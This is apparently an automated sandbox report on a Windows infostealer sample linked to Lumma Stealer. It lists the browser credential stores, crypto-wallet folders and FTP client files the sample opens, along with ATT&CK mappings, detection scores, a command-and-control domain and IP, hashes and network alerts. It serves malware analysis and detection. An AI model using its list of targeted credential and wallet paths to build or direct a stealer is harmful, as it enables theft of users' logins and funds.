                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Roaming\FTPbox
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Roaming\FTPGetter
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Roaming\FTPInfo
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\ProgramData\SiteDesigner\3D-FTP
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Roaming\FTPRush
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Roaming\Ledger Live
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Roaming\Binance
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | Directory queried: C:\Users\user\Documents
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | Directory queried: C:\Users\user\Documents\AQRFEVRTGL
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | Directory queried: C:\Users\user\Documents\EFOYFBOLXA
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | Directory queried: C:\Users\user\Documents\EIVQSAOTAQ
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | Directory queried: C:\Users\user\Documents\LFOPODGVOH
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | Directory queried: C:\Users\user\Documents\ZGGKNSUKOP
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | Directory queried: C:\Users\user\Documents\ZIPXYXWIOY
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | Directory queried: C:\Users\user\Documents\GRXZDKKVDB
                Source: C:\Users\user\Desktop\FjFeChttqA.exe | Directory queried: C:\Users\user\Documents\QCOILOQIKC
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOYJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOYJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOHJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOHJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOYJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOYJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeDirectory queried: number of queries: 1001
Source: Yara match; File source: 00000000.00000003.2201737747.00000000018D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000003.2181449137.00000000018D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000003.2180512483.00000000018B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000003.2180442038.0000000001923000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000003.2201681034.00000000018B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: FjFeChttqA.exe PID: 5568, type: MEMORYSTR

                Remote Access Functionality

Source: Yara match; File source: Process Memory Space: FjFeChttqA.exe PID: 5568, type: MEMORYSTR
Source: Yara match; File source: sslproxydump.pcap, type: PCAP
ATT&CK matrix (the number in parentheses is the count of matching signatures for that technique):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Windows Management Instrumentation (2); PowerShell (1); At; Cron; Launchd; Scheduled Task
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: Process Injection (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: Virtualization/Sandbox Evasion (34); Process Injection (1); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Software Packing (12); DLL Side-Loading (1)
Credential Access: OS Credential Dumping (2); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: Query Registry (1); Security Software Discovery (751); Virtualization/Sandbox Evasion (34); Process Discovery (2); File and Directory Discovery (2); System Information Discovery (223)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Archive Collected Data (1); Data from Local System (41); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: Encrypted Channel (11); Non-Application Layer Protocol (2); Application Layer Protocol (113); Protocol Impersonation; Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
Source | Detection | Scanner | Label
FjFeChttqA.exe | 67% | Virustotal |
FjFeChttqA.exe | 63% | ReversingLabs | Win32.Infostealer.Tinba
FjFeChttqA.exe | 100% | Avira | TR/Crypt.TPM.Gen
FjFeChttqA.exe | 100% | Joe Sandbox ML |
                No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
cuddlyready.xyz | 172.67.150.173 | true | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
172.67.150.173 | cuddlyready.xyz | United States | 13335 | CLOUDFLARENETUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1579752
Start date and time: 2024-12-23 08:34:13 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 30s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 4
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: FjFeChttqA.exe (renamed because the original name is a hash value)
Original Sample Name: e21681ef00ebfaee22cd2137a1349de0.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/0@1/1
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 1
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.63, 172.202.163.200
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                              • Execution Graph export aborted for target FjFeChttqA.exe, PID 5568 because there are no executed function
                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                              • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
02:35:08 | API Interceptor | 8x Sleep call for process: FjFeChttqA.exe modified
Match: 172.67.150.173
Associated Sample Name / URL | Detection | Threat Name | Context
RDFchOT4i0.exe | malicious | Unknown | artemis-rat.com:443
063837646WAYBILLMAR24.exe | malicious | RedLine | artemis-rat.com:443
SecuriteInfo.com.Trojan.DownLoaderNET.943.16578.26938.exe | malicious | Unknown | artemis-rat.com:443
DHL- Shipping invoice.exe | malicious | AgentTesla | artemis-rat.com:443
DHL EXPRESS.exe | malicious | AgentTesla | artemis-rat.com:443
Kazeem Engineering and Technical Services.exe | malicious | AgentTesla | heygirlisheeverythingyouwantedinaman.com:443
POs#U034fx#U034fl#U034fx#U034f..exe | malicious | AgentTesla | heygirlisheeverythingyouwantedinaman.com:443
PO-065-01-2024E-2.exe | malicious | AgentTesla | heygirlisheeverythingyouwantedinaman.com:443
New Orders#U034fx#U034fl#U034fx#U034f..exe | malicious | AgentTesla | artemis-rat.com:443
Payment Invoice.exe | malicious | AgentTesla | artemis-rat.com:443
Match: cuddlyready.xyz
Associated Sample Name / URL | Detection | Threat Name | Context
mG83m82qhF.exe | malicious | LummaC | 172.67.150.173
w23Vg439U1.exe | malicious | LummaC, Stealc | 172.67.150.173
pfY4k1qisn.exe | malicious | LummaC, Stealc | 172.67.150.173
LP4a6BowQN.exe | malicious | LummaC | 104.21.32.96
0OkLsJL2Bn.exe | malicious | LummaC, Stealc | 172.67.150.173
Wave-Executor.exe | malicious | LummaC | 193.143.1.9
Match: CLOUDFLARENETUS
Associated Sample Name / URL | Detection | Threat Name | Context
mG83m82qhF.exe | malicious | LummaC | 172.67.150.173
w23Vg439U1.exe | malicious | LummaC, Stealc | 172.67.150.173
pfY4k1qisn.exe | malicious | LummaC, Stealc | 172.67.150.173
LP4a6BowQN.exe | malicious | LummaC | 104.21.32.96
0OkLsJL2Bn.exe | malicious | LummaC, Stealc | 172.67.150.173
zLP3oiwG1g.exe | malicious | LummaC | 104.21.36.201
0HdDuWzp54.exe | malicious | LummaC, Stealc | 172.67.199.72
Yh6fS6qfTE.exe | malicious | LummaC | 104.21.36.201
NE4jxHLxXJ.exe | malicious | LummaC, Stealc | 172.67.199.72
U8mbM8r793.exe | malicious | LummaC, Stealc | 172.67.199.72
Match: a0e9f5d64349fb13191bc781f81f42e1
Associated Sample Name / URL | Detection | Threat Name | Context
mG83m82qhF.exe | malicious | LummaC | 172.67.150.173
w23Vg439U1.exe | malicious | LummaC, Stealc | 172.67.150.173
pfY4k1qisn.exe | malicious | LummaC, Stealc | 172.67.150.173
LP4a6BowQN.exe | malicious | LummaC | 172.67.150.173
0OkLsJL2Bn.exe | malicious | LummaC, Stealc | 172.67.150.173
zLP3oiwG1g.exe | malicious | LummaC | 172.67.150.173
0HdDuWzp54.exe | malicious | LummaC, Stealc | 172.67.150.173
Yh6fS6qfTE.exe | malicious | LummaC | 172.67.150.173
NE4jxHLxXJ.exe | malicious | LummaC, Stealc | 172.67.150.173
OGBLsboKIF.exe | malicious | LummaC | 172.67.150.173
No context
No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 6.541186488035888
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: FjFeChttqA.exe
File size: 2'953'728 bytes
MD5: e21681ef00ebfaee22cd2137a1349de0
SHA1: 0159be57037eff8abb75c7c241d74f3c6d664739
SHA256: d4acd1d3bf333f1c82682d9dde01e983efb126548bea388ec3adddbedbbc094c
SHA512: ad3d4ea7a9173e7740d14fad32fce3cc78f2cc00fb5c33a5a325177cb8668c964b0a094bd5bfff20e2644e795469f76d2fc576deaf3a60353615f559bb995646
SSDEEP: 49152:V6wY+7AFAyRyVj4KNgYL+zS2BPKNYIHZHnoKwP:IwYaA6yRyVj4sSBBiNYcH2
TLSH: 40D55CE3B50A75CFD48E27B8D42BCD8A999D43B9071058C3A87C687A7E63CD025F9D24
File Content Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g............................../...........@.......................... 0......1-...@.................................T0..h..
Icon Hash: 00928e8e8686b000
Entrypoint: 0x6ff000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x675F3CD1 [Sun Dec 15 20:32:17 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: 2eabe9054cad5152567f0699947a2c5b
Entrypoint instruction:
jmp 00007F5D68E75F6Ah
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x53054 | 0x68 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x531f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
- | 0x1000 | 0x51000 | 0x24800 | 069e303aee15a1d55025d64efdbbf6c2 | False | 0.9973779965753424 | data | 7.980628422807776 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x52000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x53000 | 0x1000 | 0x200 | 19a29171433eeef17e42fd663f137134 | False | 0.14453125 | data | 0.9996515881509258 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
ratrotcd | 0x54000 | 0x2aa000 | 0x2a9200 | 9cf78f9a3a1fa61de6860a5eb41f5c3a | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
lzuhqlsd | 0x2fe000 | 0x1000 | 0x400 | 6c7bef4d4dba46821991f8ce542ffe17 | False | 0.794921875 | data | 6.206173563676118 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x2ff000 | 0x3000 | 0x2200 | af11e172f6f0afa53def0cf1e7a86e3e | False | 0.06881893382352941 | DOS executable (COM) | 0.7690160347359208 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-23T08:35:08.458441+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49704 | 172.67.150.173 | 443 | TCP
2024-12-23T08:35:09.233152+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.5 | 49704 | 172.67.150.173 | 443 | TCP
2024-12-23T08:35:09.233152+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49704 | 172.67.150.173 | 443 | TCP
2024-12-23T08:35:10.457322+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49705 | 172.67.150.173 | 443 | TCP
2024-12-23T08:35:11.233480+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.5 | 49705 | 172.67.150.173 | 443 | TCP
2024-12-23T08:35:11.233480+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49705 | 172.67.150.173 | 443 | TCP
2024-12-23T08:35:12.837500+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49706 | 172.67.150.173 | 443 | TCP
2024-12-23T08:35:13.877851+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.5 | 49706 | 172.67.150.173 | 443 | TCP
2024-12-23T08:35:15.206047+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49707 | 172.67.150.173 | 443 | TCP
2024-12-23T08:35:17.578298+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49708 | 172.67.150.173 | 443 | TCP
2024-12-23T08:35:20.274938+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49709 | 172.67.150.173 | 443 | TCP
2024-12-23T08:35:22.759800+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49711 | 172.67.150.173 | 443 | TCP
2024-12-23T08:35:27.066778+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49722 | 172.67.150.173 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                              Dec 23, 2024 08:35:10.459404945 CET49705443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:10.459414959 CET44349705172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:10.459634066 CET44349705172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:10.463804960 CET49705443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:10.463831902 CET49705443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:10.463866949 CET44349705172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:11.233438015 CET44349705172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:11.233520985 CET44349705172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:11.233551979 CET44349705172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:11.233576059 CET44349705172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:11.233766079 CET49705443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:11.233766079 CET49705443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:11.233781099 CET44349705172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:11.241766930 CET44349705172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:11.241951942 CET49705443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:11.241957903 CET44349705172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:11.257889032 CET44349705172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:11.257997036 CET44349705172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:11.258084059 CET49705443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:11.258091927 CET44349705172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:11.258152008 CET49705443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:11.353111029 CET44349705172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:11.394644976 CET49705443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:11.394661903 CET44349705172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:11.429270983 CET44349705172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:11.429302931 CET44349705172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:11.429373980 CET49705443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:11.429383039 CET44349705172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:11.429544926 CET49705443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:11.429688931 CET49705443192.168.2.5172.67.150.173
